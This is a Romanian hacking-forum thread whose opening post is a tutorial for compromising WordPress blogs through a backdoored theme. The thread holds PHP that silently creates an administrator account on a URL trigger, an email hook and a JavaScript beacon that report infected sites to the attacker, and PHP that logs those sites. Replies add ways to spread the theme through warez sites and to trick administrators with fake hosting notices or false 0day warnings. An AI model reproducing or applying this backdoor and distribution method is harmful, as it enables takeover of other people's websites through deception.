Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

[The.Legend]

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale.

Sun? foarte frumos ?i defapt este foarte u?or. Tutorialul ce l-am creat ast?zi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress ?i anume, cum putem s? lu?m acces la un blog cu elegan?? ?i f?r? a l?sa urme ca s? î?i de-a seama proprietarul.

S? d?m un mic exemplu. Domnul Gheorghe vrea s? sparg? cât mai multe blog-uri de pe o anumit? ni?? web. Se gânde?te cum s? fac? un lucru de genul ?sta. Noroc c? Gheorghe este foarte inventiv ?i i-a venit în minte s? creeze ?i s? "infecteze" o tem? (theme) visual?.

Mul?i o s? spune?i c? o s? creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru c? ar l?sa urme. A?a c? va ad?uga în tem? un cod PHP care s? adauge automat un nou cont cu drepturi de administrator. Codul este urm?torul:

add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}}

Ce face codul de mai sus? Dac? este ad?ugat spre exemplu în templates.php (am precizat aceast? fil? deoarece este executat? automat când acces?m index-ul unui blog), oricine va intra pe urm?torul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator ?i cu numele: Guest ?i parola password. O remarc? important? ar fi aceea c? tema instalat? trebuie s? fie ?i cea activ?.

Legat de ingineria social? v? descurca?i voi c? sunte?i baie?i iste?i cu mult timp liber. Pute?i posta online undeva tema ?i s? adauga?i undeva anumite cuvinte pentru a crea un dork s? pute?i g?si blog-urile infectate. Sau îl pute?i manipula chiar pe administrator s? instaleze tema.

Update

Ok. Ca s? fie totul complet ?i pentru c? nu am fost mul?umit parc? dac? nu ajutam ?i cu partea asta, adic? cea în care sunte?i informa?i cu ce blog a fost infectat, pe email.

<?php
add_action('wp_head','wp_wordpressmail');function wp_wordpressmail(){
    if ( is_user_logged_in() ) {
        if(!username_exists('wordpress')){
            $addr='the.legend@domain.tld'; # Aici pune?i adresa voastr? de email
            $judul='WP URL';
            wp_mail($addr,$judul,get_bloginfo('wpurl'));
        }
    }
}
?>

S? v? bucura?i de metod?. ?i ca s? nu v? de-a de gol adresa de mail, pute?i s? o encripta?i în base64.

$addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64');

S? nu uita?i s? sterge?i tag-urile PHP când ad?uga?i în fil?.

Baft?.

Edited July 19, 2013 by The.Legend

[Bolovanus]

ingenios, simplu si eficient..bravo

[yoyois]

Si de ce are titlul asta magnific a la tinkode?

Ar trebui numit: Cum sa faci o tema infectata in WP care sa creeze un user nou cu drepturi de admin.

Sincer acum. Sa bagi 2-3 linii de cod care sa actioneze ca shell nu e "rocket science". Problema e cum sa pacalesti pe toata lumea sa-si instaleze tema ta.(lucru ft greu de facut).

[The.Legend]

Si de ce are titlul asta magnific a la tinkode?

Ar trebui numit: Cum sa faci o tema infectata in WP care sa creeze un user nou cu drepturi de admin.

Sincer acum. Sa bagi 2-3 linii de cod care sa actioneze ca shell nu e "rocket science". Problema e cum sa pacalesti pe toata lumea sa-si instaleze tema ta.(lucru ft greu de facut).

Ce leg?tur? are TinKode cu thread-ul ?sta? Nu îi pute?i da pace? ?i titlul este ales cu precizie deoarece f?r? inginerie social? nu vei putea crea acel cont de administrator. M? în?elegi acum?

Lucrurile grele se rezolv? cu metode simple dar puternice.

Legat de p?c?lit cum nume?ti tu, po?i crea o tem? proprie cu anumite cuvinte cheie (inclusiv numele temei) pentru a crea un dork s? cau?i cu el pe google. Dac? eu am un blog personal sau un site de prezentare bazat pe WordPress, automat c? primul lucru pe care îl voi face ar fi cel de a avea o tem? vizual? în concordan?? cu tematica blog-ului.

Sau alta ar fi s? anun?i un administrator de blog c? este vulnerabil la un 0day din cauza temei ce o folose?te (înainte de asta, o descarci ?i o infectezi), ?i îi propui s? î?i fac? un update la ea cu ce îi dai tu. Evident c? situa?ia sau discu?ia va fi mult mai elaborat?.

Edited July 16, 2013 by The.Legend

[SecurityRecord]

Asta + un designer bun + ThemeForest = .

[1337]

Ce leg?tur? are TinKode cu thread-ul ?sta? Nu îi pute?i da pace? ?i titlul este ales cu precizie deoarece f?r? inginerie social? nu vei putea crea acel cont de administrator. M? în?elegi acum?

Lucrurile grele se rezolv? cu metode simple dar puternice.

Legat de p?c?lit cum nume?ti tu, po?i crea o tem? proprie cu anumite cuvinte cheie (inclusiv numele temei) pentru a crea un dork s? cau?i cu el pe google. Dac? eu am un blog personal sau un site de prezentare bazat pe WordPress, automat c? primul lucru pe care îl voi face ar fi cel de a avea o tem? vizual? în concordan?? cu tematica blog-ului.

Sau alta ar fi s? anun?i un administrator de blog c? este vulnerabil la un 0day din cauza temei ce o folose?te (înainte de asta, o descarci ?i o infectezi), ?i îi propui s? î?i fac? un update la ea cu ce îi dai tu. Evident c? situa?ia sau discu?ia va fi mult mai elaborat?.

Dork : inurl:"wp-TEMA"

[xTremeSurfer]

criptezi cu ceva chestia asta :

add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}}  

trimiti un email cum ca tu ai fi de la hosting si pentru un trafic ranking nu stiu ce sa puna asta in template.php . asta ar fi o idee

[JohnyCNAM]

Ar trebui sa fie o tema spectaculoasa sa convingi lumea in ziua de azi sa o instaleze.

[The.Legend]

Eu v-am detaliat ideea, voi ave?i datoria s? v? folosi?i neuronii pentru a pune-o în aplicare.

[Brenin]

Foarte frumoasa ideea. E un inceput la niste lucruri care pot sa le faci mai departe. Un exemplu ar fi sa distribui tema la N site-uri cu teme, etc, cu o functie de mail sau POST sa te anunte ca e gata.

[The.Legend]

Pute?i desc?rca o tem? premium ?i s? o pune?i în locuri gen scriptmafia.com sau warez-bb.org. Sunt sute de mii de bloggeri care au gusturi diferite. Printre aceia se vor num?ra ?i al?ii care s? instaleze tema voastr?.

[sebywarlord]

Ar fii frumos sa poti face codul sa iti trimita si un mail cu site-ul care a activat tema ,asa nu te mai chinui sa cauti pe google!

[1337]

Mesaj adresat celor care au postat in topicul asta si au dubii asupra metodei.

O metoda "spoonfeded":

1. Cumparati o tema care nu se gaseste nulled pe net de pe ThemeForest

2. Puneti backdoor-ul in tema cumparata

3. Ii dati submit pe site-uri care se ocupa cu scripturi/teme NULLED

E ASA GREU?

[seboo00111]

Tu ne-ai dat codul, nu ne-ai explicat cum sa-l folosim. <- 0% SE

Deci poti sa scoti din titlu "Inginerie Sociala" ( care btw suna ca un c***t in Limba Romana ).

PS: No hate or w/e, am vrut doar sa fiu scurt si la obiect .

[The.Legend]

Tu ne-ai dat codul, nu ne-ai explicat cum sa-l folosim. <- 0% SE

Deci poti sa scoti din titlu "Inginerie Sociala" ( care btw suna ca un c***t in Limba Romana ).

PS: No hate or w/e, am vrut doar sa fiu scurt si la obiect .

?i-am explicat în mare procedeul prin care poate fi pus? în aplicare ideea mea. Fiecare poate dezvolta ideea ca s? î?i îndeplineasc? scopul. Pe scurt pot spune c? am dat un exemplu de inginerie social?. Dac? spui c? sun? ca naiba în român? înseamn? c? insul?i un întreg popor. Dac? a? fi în locul compatrio?ilor t?i a? avea o p?rere de toat? jena fa?? de tine. Baft? pu?tiule.

[mitica69]

@ sebywarlord

"Ar fii frumos sa poti face codul sa iti trimita si un mail cu site-ul care a activat tema ,asa nu te mai chinui sa cauti pe google"

Ar fi "bestial"

[eusimplu]

Va faceti o pagina de trimis mail(ca sa nu trimiteti voi direct mail, sa nu dea de banuit) iar dupa o puteti accesa din tema cu javascript(preferabil deoarece cu file_get_contents puteti intampina probleme), acea pagina primeste un parametru cu site-ul de unde a venit REQUEST-ul iar in caz ca nu s-a trimis deja mail cu acel site trimiteti mail-ul si s-a terminat toata treaba

[The.Legend]

Ultima idee este chiar foarte bun?. Am s? m? gândesc la ceva mai silen?ios.

Edited July 16, 2013 by tromfil
pentru că am șters un mesaj de mai sus.

[eusimplu]

Uite ceva silentios

Consta in crearea unei imagini pentru a face REQUEST-ul iar un fisier PHP adauga site-ul intr-un fisier TXT in caz ca nu exista deja. Nu stau sa comentez scriptul, sunt chestii prea simple pentru a fi comentate.

Cod JavaScript:

var img = new Image(1,1); 
img.src = 'http://www.anunta-site-spart.com/anunta.php?locatie='+encodeURIComponent(window.location);

Cod PHP de la http://www.anunta-site-spart.com/anunta.php :

<?php  
# fisier: /anunta.php
# Scopuri educative si bla bla bla

$fh = fopen('siteuri-sparte.txt','a+b');
preg_match('/https?:\/\/(www\.|)([a-zA-Z0-9\-\.]*)/i', $_GET['locatie'], $bucati_din_adresa);

$linii = array();
while( ($linie = fgets($fh)) !== false ){
	$linii[] = $linie;
}

if(!in_array($bucati_din_adresa[2], $linii)){
	fwrite($fh, $bucati_din_adresa[2].PHP_EOL);
}

fclose($fh);
?>

[The.Legend]

Î?i mul?umesc mult c? te-ai implicat ?i c? ai oferit o mân? de ajutor. Deci acum avem tot ce ne trebuie. Metoda. Ideea prin care putem face inginerie social?, ?i cum s? fim alerta?i când un blogger ?i-a instalat tema noastr? infectat?.

Dac? cineva reu?e?te s? pun? în aplicare acest tutorial, îl rog s? lase aici un reply cu p?rerea lui. Cum a fost, greu sau u?or, s.a.m.d.

[Bolovanus]

foarte interesant +1

[The.Legend]

Ok. Ca s? fie totul complet ?i pentru c? nu am fost mul?umit parc? dac? nu ajutam ?i cu partea asta, adic? cea în care sunte?i informa?i cu ce blog a fost infectat, pe email.

<?php
add_action('wp_head','wp_wordpressmail');function wp_wordpressmail(){
	if ( is_user_logged_in() ) {
		if(!username_exists('wordpress')){
			$addr='the.legend@domain.tld'; # Aici pune?i adresa voastr? de email
			$judul='WP URL';
			wp_mail($addr,$judul,get_bloginfo('wpurl'));
		}
	}
}
?>

S? v? bucura?i de metod?. ?i ca s? nu v? de-a de gol adresa de mail, pute?i s? o encripta?i în base64.

$addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64');

S? nu uita?i s? sterge?i tag-urile PHP când ad?uga?i în fil?. Baft?.

Edited July 19, 2013 by The.Legend

[mitica69]

ca sa profitam mai mult de el,n-ai putea sa-l faci in asa fel incat sa-l punem intr-un plugin nou/existent(adica editam unu deja functional) si sa spunem ca ajuta la seo/commenturi etc,asa cred ca merge mult mai usor sa faci pe cineva sa-l instaleze,asta daca ati inteles la ce-am vrut sa ma refer

[The.Legend]

Merge ad?ugat în orice fil? php al wordpress-ului (inclusiv plugins). Trebuie doar s? ?tii loca?ia codului pentru a executa parametrul de ad?ugare a contului de administrator.

[FaramirSV]

Uite ceva silentios

Consta in crearea unei imagini pentru a face REQUEST-ul iar un fisier PHP adauga site-ul intr-un fisier TXT in caz ca nu exista deja. Nu stau sa comentez scriptul, sunt chestii prea simple pentru a fi comentate.

Cod JavaScript:

var img = new Image(1,1); 
img.src = 'http://www.anunta-site-spart.com/anunta.php?locatie='+encodeURIComponent(window.location);

Cod PHP de la http://www.anunta-site-spart.com/anunta.php :

<?php  
# fisier: /anunta.php
# Scopuri educative si bla bla bla

$fh = fopen('siteuri-sparte.txt','a+b');
preg_match('/https?:\/\/(www\.|)([a-zA-Z0-9\-\.]*)/i', $_GET['locatie'], $bucati_din_adresa);

$linii = array();
while( ($linie = fgets($fh)) !== false ){
	$linii[] = $linie;
}

if(!in_array($bucati_din_adresa[2], $linii)){
	fwrite($fh, $bucati_din_adresa[2].PHP_EOL);
}

fclose($fh);
?>

da intradevar,e ceva silentios si merge doar ca in "siteuri-sparte.txt" imi vine doar numele siteului

ex: siteulmeu.ro

eu vreau sa imi vina si patch... unde a fost uploadat

ex: siteulmeu.ro/site/images/

aveti vre-o solutie pentru mine

P.S: am rezolvat,multumiri lui eusimplu

Edited July 24, 2013 by FaramirSV